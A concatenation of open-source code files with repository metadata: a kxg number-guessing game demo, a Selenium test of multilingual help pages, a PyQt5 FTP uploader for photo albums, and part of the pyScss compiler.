class GuiActor(kxg.Actor):
"""
Show the players the range of numbers that haven't been eliminated yet,
and allow the player to guess what the number is.
"""
def __init__(self):
super().__init__()
self.guess = None
self.prompt = "{0.lower_bound} < {1} < {0.upper_bound}"
def on_setup_gui(self, gui):
self.gui = gui
self.gui.window.set_handlers(self)
def on_draw(self):
self.gui.on_refresh_gui()
def on_mouse_scroll(self, x, y, dx, dy):
# If the user scrolls the mouse wheel, update the guess accordingly.
if self.guess is None:
if dy < 0:
self.guess = self.world.upper_bound
else:
self.guess = self.world.lower_bound
self.guess = sorted([
self.world.lower_bound,
self.guess + dy,
self.world.upper_bound,
])[1]
self.on_update_prompt()
def on_key_press(self, symbol, modifiers):
# If the user types a number, add that digit to the guess.
try:
digit = int(chr(symbol))
self.guess = 10 * (self.guess or 0) + digit
except ValueError:
pass
# If the user hits backspace, remove the last digit from the guess.
if symbol == pyglet.window.key.BACKSPACE:
if self.guess is not None:
guess_str = str(self.guess)[:-1]
self.guess = int(guess_str) if guess_str else None
# If the user hits enter, guess the current number.
if symbol == pyglet.window.key.ENTER:
if self.guess:
self >> GuessNumber(self.id, self.guess)
self.guess = None
self.on_update_prompt()
@kxg.subscribe_to_message(PickNumber)
@kxg.subscribe_to_message(GuessNumber)
def on_update_prompt(self, message=None):
guess_str = '???' if self.guess is None else str(self.guess)
self.gui.label.text = self.prompt.format(self.world, guess_str)
def on_finish_game(self):
self.gui.window.pop_handlers()
if self.world.winner == self.id:
self.gui.label.text = "You won!"
else:
self.gui.label.text = "You lost!"
class AiActor(kxg.Actor):
"""
Wait a random amount of time, then guess a random number within the
remaining range.
"""
def __init__(self):
super().__init__()
self.reset_timer()
def on_update_game(self, dt):
self.timer -= dt
if self.timer < 0:
lower_bound = self.world.lower_bound + 1
upper_bound = self.world.upper_bound - 1
guess = random.randint(lower_bound, upper_bound)
self >> GuessNumber(self.id, guess)
self.reset_timer()
def reset_timer(self):
self.timer = random.uniform(1, 3)
if __name__ == '__main__':
kxg.quickstart.main(World, Referee, Gui, GuiActor, AiActor)
|
kxgames/kxg
|
demos/guess_my_number.py
|
Python
|
mit
| 5,672 | 0.001587 |
from selenium_test_case import SeleniumTestCase
class DocsTest(SeleniumTestCase):
def test_links_between_pages(self):
self.open_path('/help')
self.assert_text_present('Frequently Asked Questions')
self.click_and_wait('link=Terms of Service')
self.assert_text_present('Terms of Service for Google Resource Finder')
self.click_and_wait('link=Privacy')
self.assert_text_present('Google Resource Finder Privacy Policy')
self.click_and_wait('link=Help')
self.assert_text_present('Frequently Asked Questions')
def test_languages(self):
# English (en)
self.open_path('/help?lang=en')
self.assert_text_present('Frequently Asked Questions')
self.click_and_wait('link=Terms of Service')
self.assert_text_present('Terms of Service for Google Resource Finder')
self.click_and_wait('link=Privacy')
self.assert_text_present('Google Resource Finder Privacy Policy')
self.click_and_wait('link=Help')
self.assert_text_present('Frequently Asked Questions')
# Spanish (es-419)
self.open_path('/help?lang=es')
self.assert_text_present('Preguntas frecuentes')
self.click_and_wait('link=Condiciones del servicio')
self.assert_text_present(
'Condiciones del servicio del Buscador de recursos de Google')
self.click_and_wait(u'link=Privacidad')
self.assert_text_present(
u'Pol\u00edtica de privacidad del Buscador de recursos de Google')
self.click_and_wait(u'link=Ayuda')
self.assert_text_present('Preguntas frecuentes')
# French (fr)
self.open_path('/help?lang=fr')
self.assert_text_present(u'Questions fr\u00e9quentes')
self.click_and_wait('link=Conditions d\'utilisation')
self.assert_text_present(
u'Conditions d\'utilisation de Google Resource Finder')
self.click_and_wait(u'link=Confidentialit\u00e9')
self.assert_text_present(
u'R\u00e8gles de confidentialit\u00e9 de Google Resource Finder')
self.click_and_wait(u'link=Aide')
self.assert_text_present(u'Questions fr\u00e9quentes')
# Kreyol (ht)
self.open_path('/help?lang=ht')
self.assert_text_present(u'Kesyon Div\u00e8s Moun Poze Tout Tan')
self.click_and_wait(u'link=Kondisyon S\u00e8vis yo')
self.assert_text_present(
u'Kondisyon S\u00e8vis pou Resource Finder Google')
self.click_and_wait(u'link=Vi prive')
self.assert_text_present(u'Politik Resp\u00e8 Pou Moun ak ' +
u'\u201cResource Finder\u201d nan Google')
self.click_and_wait(u'link=Ed')
self.assert_text_present(u'Kesyon Div\u00e8s Moun Poze Tout Tan')
|
Princessgladys/googleresourcefinder
|
tests/docs_test.py
|
Python
|
apache-2.0
| 2,824 | 0 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys, time, os, hashlib, atexit
import ftplib
import traceback
from PyQt5.QtWidgets import QApplication, QWidget, QFileDialog
from PyQt5.QtWidgets import QPushButton, QHBoxLayout, QVBoxLayout, \
QScrollArea, QLineEdit, QCheckBox, QMessageBox, QMenu
from PyQt5 import QtGui
from PyQt5.QtGui import QIcon, QPalette, QLinearGradient, QColor, QBrush, QCursor
from PyQt5.QtCore import Qt, QObject, QThread, pyqtSignal, pyqtSlot, QEvent, QSettings
album_uploaders = {}
class MainWindow(QWidget):
_album_buttons = {}
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
def _start():
try:
self.start_work(name.text(), passwd.text(), remember.checkState())
except ftplib.error_perm as e:
QMessageBox.critical(self, 'Error', 'Неверный пароль!', QMessageBox.Ok)
except Exception as e:
s = traceback.format_exc()
QMessageBox.critical(self, 'Ошибка', 'Пожалуйста, отправьте данную информацию разработчикам:\n\n %s' % s,
QMessageBox.Ok)
self.resize(600, 400)
self.setWindowTitle('Загрузка по FTP в Фотобанк')
self.setWindowIcon(QIcon('resources/favicon.ico'))
# set layouts
name = QLineEdit(settings.login)
name.returnPressed.connect(_start)
name.setPlaceholderText('Логин в фотобанк')
passwd = QLineEdit(settings.passwd)
passwd.returnPressed.connect(_start)
passwd.setPlaceholderText('Пароль для фотобанка')
passwd.setEchoMode(QLineEdit.Password)
remember = QCheckBox('Запомнить?', checked=settings.remember)
login = QPushButton('Вход')
auth_panel = QHBoxLayout()
auth_panel.addWidget(name)
auth_panel.addWidget(passwd)
auth_panel.addWidget(remember)
auth_panel.addWidget(login)
login.clicked.connect(_start)
# login.clicked.connect(lambda: self.start_work(name.text(), passwd.text(), remember.checkState()))
btn_area = QScrollArea()
btn_area_widget = QWidget()
btn_area.setWidget(btn_area_widget)
self.__btn_area_layout = btn_area_layout = QVBoxLayout(btn_area_widget)
btn_area.setWidgetResizable(True)
central_box = QHBoxLayout()
central_box.addWidget(btn_area)
vbox = QVBoxLayout()
# vbox.addStretch()
vbox.addLayout(auth_panel)
vbox.addLayout(central_box)
self.setLayout(vbox)
self.show()
def set_ftp_credentials(self, login, passwd, remember):
# set ftp credentials
#print (login, passwd, remember)
self.__ftp_login = login
self.__ftp_passwd = passwd
self.__ftp_remember = remember
def add_album_buttons(self, albums):
# adds album buttons
layout = self.__btn_area_layout
for name in albums:
if name not in self._album_buttons:
button = AlbumButton(name, self.__ftp_login, self.__ftp_passwd)
layout.addWidget(button)
self._album_buttons[name] = button
def start_work(self, login, passwd, remember):
# start work:
# - remember credentials
# - establish connection
# - get albums
self.set_ftp_credentials(login, passwd, remember)
if remember:
save_settings(login=login, passwd=passwd, remember=remember)
self.__ftp = start_ftp(login, passwd)
albums = sort_albums(get_albums(self.__ftp))
self.add_album_buttons(albums)
def enqueueFiles_XXX(self, album_name, fileslist):
# enqueue files to specific folder uploader
worker = album_uploaders.get(album_name)
if worker is None:
# start new uploader
worker = AlbumUploader()
worker.setName(album_name)
thread = QThread(self)
worker.moveToThread(thread)
thread.started.connect(worker.process)
worker.finished.connect(thread.quit)
worker.finished.connect(worker.deleteLater)
thread.finished.connect(thread.deleteLater)
# worker.message.connect(self.text)
thread.start()
album_uploaders[album_name] = worker
def closeEvent(self, event):
# check and exit
workers = len(album_uploaders)
if workers > 0:
reply = QMessageBox.question(self, 'Закрыть программу?',
'Вы уверены, что хотите выйти? \nСейчас загружается %s альбом(а,ов)' % workers,
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply != QMessageBox.Yes:
event.ignore()
return
event.accept()
class AlbumUploader(QObject):
name = ''
finished = pyqtSignal()
message = pyqtSignal(int)
progress_message = pyqtSignal(str, float, bool)
fileslist = None
ftp = None # connection to server
i = 0
active = False
progress = 0.0
def setName(self, name, ftp_login, ftp_passwd):
self.name = name
self.ftp_login = ftp_login
self.ftp_passwd = ftp_passwd
def __str__(self):
return 'AlbumUploader @%s ftp=%s name="%s" i=%s len=%s fileslist=%s' % \
(id(self), self.ftp, self.name, self.i, len(self.fileslist), self.fileslist)
def prepareFtp(self):
self.ftp = start_ftp(self.ftp_login, self.ftp_passwd)
#print('FTP conn: %s', self.ftp)
cwd = '/' + self.name
self.ftp.cwd(cwd)
self.ftp.set_pasv(True)
self.ftp.sendcmd('TYPE I')
self.ftp.set_debuglevel(2)
def uploadFile(self, f):
# upload file to server
#print('Uploading file "%s"' % f)
fil = open(f, 'rb')
size_local = os.path.getsize(f)
basename = os.path.basename(f)
self.ftp.storbinary('STOR '+basename, fil)
size_remote = self.ftp.size(basename)
md5 = hashlib.md5(fil.read()).hexdigest()
#print('Uploaded file %s md5=%s size_local=%s size_remote=%s' % (f, md5, size_local, size_remote))
fil.close()
if size_remote != size_local:
raise Exception("Sizes don't match!")
def getProgress(self):
# return current progress percent
if self.startlen == 0:
return 0.0
return float(self.startlen-len(self.fileslist))/self.startlen
def updateButton(self):
# update album button style:
# progressbar
# show activity
# percent = float(self.startlen-len(self.fileslist))/self.startlen
self.progress_message.emit(self.name, self.getProgress(), self.active)
@pyqtSlot()
def process(self):
#print('START %s', self)
#print('fileslist: %s' % self.fileslist)
self.prepareFtp()
self.i = 0
self.startlen = len(self.fileslist)
self.active = True
self.updateButton()
while True:
# get first file name
#print("New load cycle by %s" % self)
try:
f = self.fileslist.pop(0)
self.uploadFile(f)
#print('sleep', self.i, len(self.fileslist), f)
self.message.emit(self.i)
self.updateButton()
# time.sleep(2.0)
# 1/(1-1)
except IndexError as err:
#print('upload fileslist is empty. \nGot error: %s\n' % err)
break
except Exception as err:
#print('Fatal!!!! \nWhile uploading file "%s" got error: \n%s' % (f, err))
traceback.print_exc(file=sys.stdout)
self.fileslist.append(f)
time.sleep(2.0)
self.prepareFtp()
#print('FINISHED')
#print('These file(s) were not uploaded: %s' % self.fileslist)
self.active=False
self.updateButton()
self.finished.emit()
self.fileslist = []
self.startlen = len(self.fileslist)
def enqueueFiles(self, fileslist):
if self.fileslist is None:
self.fileslist = []
self.startlen = 0
for f in fileslist:
if os.path.isdir(f):
subdirfiles = [os.path.join(f, i) for i in os.listdir(f)]
self.enqueueFiles(subdirfiles)
else:
self.fileslist.append(f)
self.startlen += 1
# self.fileslist.extend(fileslist)
# self.startlen += len(fileslist)
class AlbumButton(QPushButton):
"""docstring for AlbumButton"""
drop_ready = pyqtSignal(bool)
def __init__(self, name, ftp_login, ftp_passwd):
# super(AlbumButton, self).__init__()
QPushButton.__init__(self, name)
self.name = name
self.ftp_login = ftp_login
self.ftp_passwd = ftp_passwd
# self.active = False
self.setStyleSheet(self.formatStyle())
self.setAcceptDrops(True)
self.drop_ready.connect(self.setDropReady)
# self.setToolTip('Левая кнопка - загрузить файлы\nПравая - дополнительные действия')
def contextMenuEvent(self, event):
menu = QMenu(self)
menu.addAction('Добавить файлы к альбому', self.selectFiles)
menu.show()
menu.exec_(QCursor.pos())
def mousePressEvent(self, event):
if event.type() in (QEvent.MouseButtonPress,) and event.button() == Qt.LeftButton:
self.selectFiles()
else:
super().mousePressEvent(event)
def setDropReady(self, ready):
# print (self.name, ready)
self.setProperty('dropReady', ready)
self.style().unpolish(self)
self.style().polish(self)
# self.update()
self.repaint()
def dragLeaveEvent(self, event):
self.drop_ready.emit(False)
super().dragLeaveEvent(event)
event.accept()
def dragEnterEvent(self, event):
self.drop_ready.emit(True)
super().dragEnterEvent(event)
event.accept()
def dropEvent(self, event):
urls = event.mimeData().urls()
print (urls)
self.drop_ready.emit(False)
self.enqueueFilesToUpload([u.toLocalFile() for u in urls])
event.accept()
def selectFiles(self):
# show dialog, get list of files/dir, start uploader
dialog = QFileDialog()
dialog.setFileMode(QFileDialog.AnyFile)
qfileslist = dialog.getOpenFileNames(self, u'Загрузка в альбом "%s"' % self.name)[0]
fileslist = [str(x) for x in qfileslist]
if fileslist:
self.enqueueFilesToUpload(fileslist)
def enqueueFilesToUpload(self, fileslist):
# add fileslist (str[]) to
# enqueue files to specific folder uploader
album_name = self.name
uploader = album_uploaders.get(album_name)
if uploader is None:
# start new uploader
uploader = AlbumUploader()
uploader.setName(album_name, self.ftp_login, self.ftp_passwd)
thread = QThread(self)
uploader.moveToThread(thread)
thread.started.connect(uploader.process)
uploader.finished.connect(thread.quit)
# uploader.finished.connect(lambda: print('==FINISHED'))
uploader.finished.connect(uploader.deleteLater)
thread.finished.connect(thread.deleteLater)
uploader.finished.connect(lambda: self.cleanAlbumUploaders(album_name))
uploader.progress_message.connect(self.updateProgressBar)
# uploader.message.connect(self.text)
thread.start()
album_uploaders[album_name] = uploader
uploader.enqueueFiles(fileslist) ### ???
#print('AlbumUploaders after enqueue: ', album_uploaders)
def cleanAlbumUploaders(self, album_name):
del album_uploaders[album_name]
#print('AlbumUploaders after clean: ', album_uploaders)
def formatStyle(self, percent=0.0, active=False):
# format style depending on progress level
low = percent-0.001
if low < 0.0 : low = 0
high = percent+0.001
if high >= 1.0 : high = 0.9999
color = "#d8d8d8"
if active:
color = "#ffffd8"
# self.setText(self.name + ' (Загружено ' + ('%0.f' % (percent*100)) + '%)' ) # + ' %02.f' % 100*percent)
style = """QPushButton {font-size: 16pt; /* background-color: #d8d8d8; */ padding: 0.5em; margin: 0.3em;
background: qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0,
stop: 0 green, stop: %(low)s green, stop: %(high)s %(color)s, stop: 1.0 %(color)s)}
QPushButton[dropReady="true"]:hover { background-color: #d8f0d8; font-weight: bold; }
QPushButton:hover {background-color: #d8f0d8; /* border: solid 1px green */}
""" % dict(low=low, high=high, color=color)
return style
def updateProgressBar(self, name, percent, active=False):
#print ('Updating updateProgressBar to', percent)
style = self.formatStyle(percent, active)
self.setStyleSheet(style)
if active:
# color = "#ffffd8"
self.setText(self.name + ' (Загружено ' + ('%0.f' % (percent*100)) + '%)' ) # + ' %02.f' % 100*percent)
# print (style)
def start_ftp(login, passwd):
# starts ftp connection
ftp = ftplib.FTP(settings.host, login, passwd, None, 180)
ftp.encoding = 'utf-8'
ftp.set_debuglevel(level=0)
ftp.set_pasv(True)
return ftp
def get_qsettings():
'''returns QSettings with set Company and Product names'''
return QSettings(settings.company, settings.product)
def save_settings(login, passwd, remember):
qset = get_qsettings()
qset.setValue('login', login)
qset.setValue('passwd', passwd)
qset.setValue('remember', remember)
def restore_settings(settings):
qset = get_qsettings()
settings.login = qset.value('login', type=str)
settings.passwd = qset.value('passwd', type=str)
settings.remember = qset.value('remember', type=bool)
def get_albums(ftp):
#retrives albums for specified connection
def get_albums_cb(rows):
# callback for function get_albums - receives rows from LIST command
# print(rows, type(rows), repr(rows))
for row in rows.split("\n"):
name = str.split(row, maxsplit=8)[-1]
albums.append(name)
albums = []
ftp.retrlines('LIST', get_albums_cb)
return albums
def sort_albums(albums):
# sorts albums by their ids
def sorter(name):
try:
return int(name.split("-")[0])
except:
return -1
return sorted(albums, key=sorter, reverse=True)
if __name__ == '__main__':
try:
import settings
except Exception:
import types
settings = types.ModuleType('settings', '''Default empty login and password''')
settings.login = ''
settings.passwd = ''
settings.host = ''
remember = False
settings.command = 'MyCompany'
settings.product = 'MyFtpProduct'
restore_settings(settings)
app = QApplication(sys.argv)
wnd = MainWindow()
sys.exit(app.exec())
|
lisitsky/one-button-ftp
|
pyftp1.py
|
Python
|
mit
| 15,763 | 0.004916 |
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from collections import defaultdict
from enum import Enum
import logging
from pathlib import Path
import re
import sys
import warnings
try:
from collections import OrderedDict
except ImportError:
# Backport
from ordereddict import OrderedDict
import six
from scss.calculator import Calculator
from scss.cssdefs import _spaces_re
from scss.cssdefs import _escape_chars_re
from scss.cssdefs import _prop_split_re
from scss.errors import SassError
from scss.errors import SassBaseError
from scss.errors import SassImportError
from scss.extension import Extension
from scss.extension.core import CoreExtension
from scss.extension import NamespaceAdapterExtension
from scss.grammar import locate_blocks
from scss.rule import BlockAtRuleHeader
from scss.rule import Namespace
from scss.rule import RuleAncestry
from scss.rule import SassRule
from scss.rule import UnparsedBlock
from scss.selector import Selector
from scss.source import SourceFile
from scss.types import Arglist
from scss.types import List
from scss.types import Null
from scss.types import Number
from scss.types import String
from scss.types import Undefined
from scss.types import Url
from scss.util import normalize_var # TODO put in... namespace maybe?
# TODO should mention logging for the programmatic interface in the
# documentation
# TODO or have a little helper (or compiler setting) to turn it on
log = logging.getLogger(__name__)
_xcss_extends_re = re.compile(r'\s+extends\s+')
class OutputStyle(Enum):
nested = ()
compact = ()
compressed = ()
expanded = ()
legacy = () # ???
class SassDeprecationWarning(UserWarning):
# Note: DO NOT inherit from DeprecationWarning; it's turned off by default
# in 2.7 and later!
pass
def warn_deprecated(rule, message):
warnings.warn(
"{0} (at {1})".format(message, rule.file_and_line),
SassDeprecationWarning,
stacklevel=2,
)
class Compiler(object):
"""A Sass compiler. Stores settings and knows how to fire off a
compilation. Main entry point into compiling Sass.
"""
def __init__(
self, root=Path(), search_path=(),
namespace=None, extensions=(CoreExtension,),
import_static_css=False,
output_style='nested', generate_source_map=False,
live_errors=False, warn_unused_imports=False,
ignore_parse_errors=False,
loops_have_own_scopes=True,
undefined_variables_fatal=True,
super_selector='',
):
"""Configure a compiler.
:param root: Directory to treat as the "project root". Search paths
and some custom extensions (e.g. Compass) are relative to this
directory. Defaults to the current directory.
:type root: :class:`pathlib.Path`
:param search_path: List of paths to search for ``@import``s, relative
to ``root``. Absolute and parent paths are allowed here, but
``@import`` will refuse to load files that aren't in one of the
directories here. Defaults to only the root.
:type search_path: list of strings, :class:`pathlib.Path` objects, or
something that implements a similar interface (useful for custom
pseudo filesystems)
"""
# TODO perhaps polite to automatically cast any string paths to Path?
# but have to be careful since the api explicitly allows dummy objects.
if root is None:
self.root = None
else:
self.root = root.resolve()
self.search_path = tuple(
self.normalize_path(path)
for path in search_path
)
self.extensions = []
if namespace is not None:
self.extensions.append(NamespaceAdapterExtension(namespace))
for extension in extensions:
if isinstance(extension, Extension):
self.extensions.append(extension)
elif (isinstance(extension, type) and
issubclass(extension, Extension)):
self.extensions.append(extension())
elif isinstance(extension, Namespace):
self.extensions.append(
NamespaceAdapterExtension(extension))
else:
raise TypeError(
"Expected an Extension or Namespace, got: {0!r}"
.format(extension)
)
if import_static_css:
self.dynamic_extensions = ('.scss', '.sass', '.css')
self.static_extensions = ()
else:
self.dynamic_extensions = ('.scss', '.sass')
self.static_extensions = ('.css',)
self.output_style = output_style
self.generate_source_map = generate_source_map
self.live_errors = live_errors
self.warn_unused_imports = warn_unused_imports
self.ignore_parse_errors = ignore_parse_errors
self.loops_have_own_scopes = loops_have_own_scopes
self.undefined_variables_fatal = undefined_variables_fatal
self.super_selector = super_selector
def normalize_path(self, path):
if isinstance(path, six.string_types):
path = Path(path)
if path.is_absolute():
return path
if self.root is None:
raise IOError("Can't make absolute path when root is None")
return self.root / path
def make_compilation(self):
return Compilation(self)
def call_and_catch_errors(self, f, *args, **kwargs):
"""Call the given function with the given arguments. If it succeeds,
return its return value. If it raises a :class:`scss.errors.SassError`
and `live_errors` is turned on, return CSS containing a traceback and
error message.
"""
try:
return f(*args, **kwargs)
except SassError as e:
if self.live_errors:
# TODO should this setting also capture and display warnings?
return e.to_css()
else:
raise
def compile(self, *filenames):
# TODO this doesn't spit out the compilation itself, so if you want to
# get something out besides just the output, you have to copy this
# method. that sucks.
# TODO i think the right thing is to get all the constructors out of
# SourceFile, since it's really the compiler that knows the import
# paths and should be consulted about this. reconsider all this (but
# preserve it for now, SIGH) once importers are a thing
compilation = self.make_compilation()
for filename in filenames:
# TODO maybe SourceFile should not be exposed to the end user, and
# instead Compilation should have methods for add_string etc. that
# can call normalize_path.
# TODO it's not possible to inject custom files into the
# /compiler/ as persistent across compiles, nor to provide "fake"
# imports. do we want the former? is the latter better suited to
# an extension?
source = SourceFile.from_filename(self.normalize_path(filename))
compilation.add_source(source)
return self.call_and_catch_errors(compilation.run)
def compile_sources(self, *sources):
# TODO this api is not the best please don't use it. this all needs to
# be vastly simplified, still, somehow.
compilation = self.make_compilation()
for source in sources:
compilation.add_source(source)
return self.call_and_catch_errors(compilation.run)
def compile_string(self, string):
source = SourceFile.from_string(string)
compilation = self.make_compilation()
compilation.add_source(source)
return self.call_and_catch_errors(compilation.run)
def compile_file(filename, compiler_class=Compiler, **kwargs):
"""Compile a single file (provided as a :class:`pathlib.Path`), and return
a string of CSS.
Keyword arguments are passed along to the underlying `Compiler`.
Note that the search path is set to the file's containing directory by
default, unless you explicitly pass a ``search_path`` kwarg.
:param filename: Path to the file to compile.
:type filename: str, bytes, or :class:`pathlib.Path`
"""
filename = Path(filename)
if 'search_path' not in kwargs:
kwargs['search_path'] = [filename.parent.resolve()]
compiler = compiler_class(**kwargs)
return compiler.compile(filename)
def compile_string(string, compiler_class=Compiler, **kwargs):
"""Compile a single string, and return a string of CSS.
Keyword arguments are passed along to the underlying `Compiler`.
"""
compiler = compiler_class(**kwargs)
return compiler.compile_string(string)
class Compilation(object):
"""A single run of a compiler."""
def __init__(self, compiler):
self.compiler = compiler
self.ignore_parse_errors = compiler.ignore_parse_errors
# TODO this needs a write barrier, so assignment can't overwrite what's
# in the original namespaces
# TODO or maybe the extensions themselves should take care of that, so
# it IS possible to overwrite from within sass, but only per-instance?
self.root_namespace = Namespace.derive_from(*(
ext.namespace for ext in compiler.extensions
if ext.namespace
))
self.sources = []
self.source_index = {}
self.dependency_map = defaultdict(frozenset)
self.rules = []
def should_scope_loop_in_rule(self, rule):
"""Return True iff a looping construct (@each, @for, @while, @if)
should get its own scope, as is standard Sass behavior.
"""
return rule.legacy_compiler_options.get(
'control_scoping', self.compiler.loops_have_own_scopes)
def add_source(self, source):
if source.key in self.source_index:
return self.source_index[source.key]
self.sources.append(source)
self.source_index[source.key] = source
return source
def run(self):
# this will compile and manage rule: child objects inside of a node
self.parse_children()
# this will manage @extends
self.rules = self.apply_extends(self.rules)
rules_by_file, css_files = self.parse_properties()
all_rules = 0
all_selectors = 0
exceeded = ''
final_cont = ''
files = len(css_files)
for source_file in css_files:
rules = rules_by_file[source_file]
fcont, total_rules, total_selectors = self.create_css(rules)
all_rules += total_rules
all_selectors += total_selectors
# TODO i would love for the output of this function to be something
# useful for producing stats, so this stuff can live on the Scss
# class only
if not exceeded and all_selectors > 4095:
exceeded = " (IE exceeded!)"
log.error("Maximum number of supported selectors in Internet Explorer (4095) exceeded!")
if files > 1 and self.compiler.generate_source_map:
final_cont += "/* %s %s generated from '%s' add up to a total of %s %s accumulated%s */\n" % (
total_selectors,
'selector' if total_selectors == 1 else 'selectors',
source_file.path,
all_selectors,
'selector' if all_selectors == 1 else 'selectors',
exceeded)
final_cont += fcont
return final_cont
def parse_selectors(self, raw_selectors):
"""
Parses out the old xCSS "foo extends bar" syntax.
Returns a 2-tuple: a set of selectors, and a set of extended selectors.
"""
# Fix tabs and spaces in selectors
raw_selectors = _spaces_re.sub(' ', raw_selectors)
parts = _xcss_extends_re.split(raw_selectors, 1) # handle old xCSS extends
if len(parts) > 1:
unparsed_selectors, unsplit_parents = parts
# Multiple `extends` are delimited by `&`
unparsed_parents = unsplit_parents.split('&')
else:
unparsed_selectors, = parts
unparsed_parents = ()
selectors = Selector.parse_many(unparsed_selectors)
parents = [Selector.parse_one(parent) for parent in unparsed_parents]
return selectors, parents
# @print_timing(3)
def parse_children(self, scope=None):
children = []
root_namespace = self.root_namespace
for source_file in self.sources:
rule = SassRule(
source_file=source_file,
lineno=1,
unparsed_contents=source_file.contents,
namespace=root_namespace,
)
self.rules.append(rule)
children.append(rule)
for rule in children:
self.manage_children(rule, scope)
self._warn_unused_imports(self.rules[0])
def _warn_unused_imports(self, rule):
if not rule.legacy_compiler_options.get(
'warn_unused', self.compiler.warn_unused_imports):
return
for name, file_and_line in rule.namespace.unused_imports():
log.warn("Unused @import: '%s' (%s)", name, file_and_line)
def _make_calculator(self, namespace):
return Calculator(
namespace,
ignore_parse_errors=self.ignore_parse_errors,
undefined_variables_fatal=self.compiler.undefined_variables_fatal,
)
# @print_timing(4)
def manage_children(self, rule, scope):
try:
self._manage_children_impl(rule, scope)
except SassBaseError as e:
e.add_rule(rule)
raise
except Exception as e:
raise SassError(e, rule=rule)
def _manage_children_impl(self, rule, scope):
calculator = self._make_calculator(rule.namespace)
for c_lineno, c_property, c_codestr in locate_blocks(rule.unparsed_contents):
block = UnparsedBlock(rule, c_lineno, c_property, c_codestr)
####################################################################
# At (@) blocks
if block.is_atrule:
# TODO particularly wild idea: allow extensions to handle
# unrecognized blocks, and get the pyscss stuff out of the
# core? even move the core stuff into the core extension?
code = block.directive
code = '_at_' + code.lower().replace(' ', '_')[1:]
try:
method = getattr(self, code)
except AttributeError:
if block.unparsed_contents is None:
rule.properties.append((block.prop, None))
elif scope is None: # needs to have no scope to crawl down the nested rules
self._nest_at_rules(rule, scope, block)
else:
method(calculator, rule, scope, block)
####################################################################
# Properties
elif block.unparsed_contents is None:
self._get_properties(rule, scope, block)
# Nested properties
elif block.is_scope:
if block.header.unscoped_value:
# Possibly deal with default unscoped value
self._get_properties(rule, scope, block)
rule.unparsed_contents = block.unparsed_contents
subscope = (scope or '') + block.header.scope + '-'
self.manage_children(rule, subscope)
####################################################################
# Nested rules
elif scope is None: # needs to have no scope to crawl down the nested rules
self._nest_rules(rule, scope, block)
def _at_warn(self, calculator, rule, scope, block):
"""
Implements @warn
"""
value = calculator.calculate(block.argument)
log.warn(repr(value))
def _at_print(self, calculator, rule, scope, block):
"""
Implements @print
"""
value = calculator.calculate(block.argument)
sys.stderr.write("%s\n" % value)
def _at_raw(self, calculator, rule, scope, block):
"""
Implements @raw
"""
value = calculator.calculate(block.argument)
sys.stderr.write("%s\n" % repr(value))
def _at_dump_context(self, calculator, rule, scope, block):
"""
Implements @dump_context
"""
sys.stderr.write("%s\n" % repr(rule.namespace._variables))
def _at_dump_functions(self, calculator, rule, scope, block):
"""
Implements @dump_functions
"""
sys.stderr.write("%s\n" % repr(rule.namespace._functions))
def _at_dump_mixins(self, calculator, rule, scope, block):
"""
Implements @dump_mixins
"""
sys.stderr.write("%s\n" % repr(rule.namespace._mixins))
def _at_dump_imports(self, calculator, rule, scope, block):
"""
Implements @dump_imports
"""
sys.stderr.write("%s\n" % repr(rule.namespace._imports))
def _at_dump_options(self, calculator, rule, scope, block):
"""
Implements @dump_options
"""
sys.stderr.write("%s\n" % repr(rule.options))
def _at_debug(self, calculator, rule, scope, block):
"""
Implements @debug
"""
setting = block.argument.strip()
if setting.lower() in ('1', 'true', 't', 'yes', 'y', 'on'):
setting = True
elif setting.lower() in ('0', 'false', 'f', 'no', 'n', 'off', 'undefined'):
setting = False
self.ignore_parse_errors = setting
log.info("Debug mode is %s", 'On' if self.ignore_parse_errors else 'Off')
def _at_pdb(self, calculator, rule, scope, block):
"""
Implements @pdb
"""
try:
import ipdb as pdb
except ImportError:
import pdb
pdb.set_trace()
def _at_extend(self, calculator, rule, scope, block):
"""
Implements @extend
"""
from scss.selector import Selector
selectors = calculator.apply_vars(block.argument)
rule.extends_selectors.extend(Selector.parse_many(selectors))
def _at_return(self, calculator, rule, scope, block):
"""
Implements @return
"""
# TODO should assert this only happens within a @function
ret = calculator.calculate(block.argument)
raise SassReturn(ret)
# @print_timing(10)
def _at_option(self, calculator, rule, scope, block):
"""
Implements @option
"""
# TODO This only actually supports "style" (which only really makes
# sense as the first thing in a single input file) or "warn_unused"
# (which only makes sense at file level /at best/). Explore either
# replacing this with a better mechanism or dropping it entirely.
# Note also that all rules share the same underlying legacy option
# dict, so the rules aren't even lexically scoped like you might think,
# and @importing a file can change the compiler! That seems totally
# wrong.
for option in block.argument.split(','):
key, colon, value = option.partition(':')
key = key.strip().lower().replace('-', '_')
value = value.strip().lower()
if value in ('1', 'true', 't', 'yes', 'y', 'on'):
value = True
elif value in ('0', 'false', 'f', 'no', 'n', 'off', 'undefined'):
value = False
elif not colon:
value = True
if key == 'compress':
warn_deprecated(
rule,
"The 'compress' @option is deprecated. "
"Please use 'style' instead."
)
key = 'style'
value = 'compressed' if value else 'legacy'
if key in ('short_colors', 'reverse_colors'):
warn_deprecated(
rule,
"The '{0}' @option no longer has any effect."
.format(key),
)
return
elif key == 'style':
try:
OutputStyle[value]
except KeyError:
raise SassError("No such output style: {0}".format(value))
elif key in ('warn_unused', 'control_scoping'):
# TODO deprecate control_scoping? or add it to compiler?
if not isinstance(value, bool):
raise SassError("The '{0}' @option requires a bool, not {1!r}".format(key, value))
else:
raise SassError("Unknown @option: {0}".format(key))
rule.legacy_compiler_options[key] = value
def _get_funct_def(self, rule, calculator, argument):
funct, lpar, argstr = argument.partition('(')
funct = calculator.do_glob_math(funct)
funct = normalize_var(funct.strip())
argstr = argstr.strip()
# Parse arguments with the argspec rule
if lpar:
if not argstr.endswith(')'):
raise SyntaxError("Expected ')', found end of line for %s (%s)" % (funct, rule.file_and_line))
argstr = argstr[:-1].strip()
else:
# Whoops, no parens at all. That's like calling with no arguments.
argstr = ''
argspec_node = calculator.parse_expression(argstr, target='goal_argspec')
return funct, argspec_node
def _populate_namespace_from_call(self, name, callee_namespace, mixin, args, kwargs):
# Mutation protection
args = list(args)
kwargs = OrderedDict(kwargs)
#m_params = mixin[0]
#m_defaults = mixin[1]
#m_codestr = mixin[2]
pristine_callee_namespace = mixin[3]
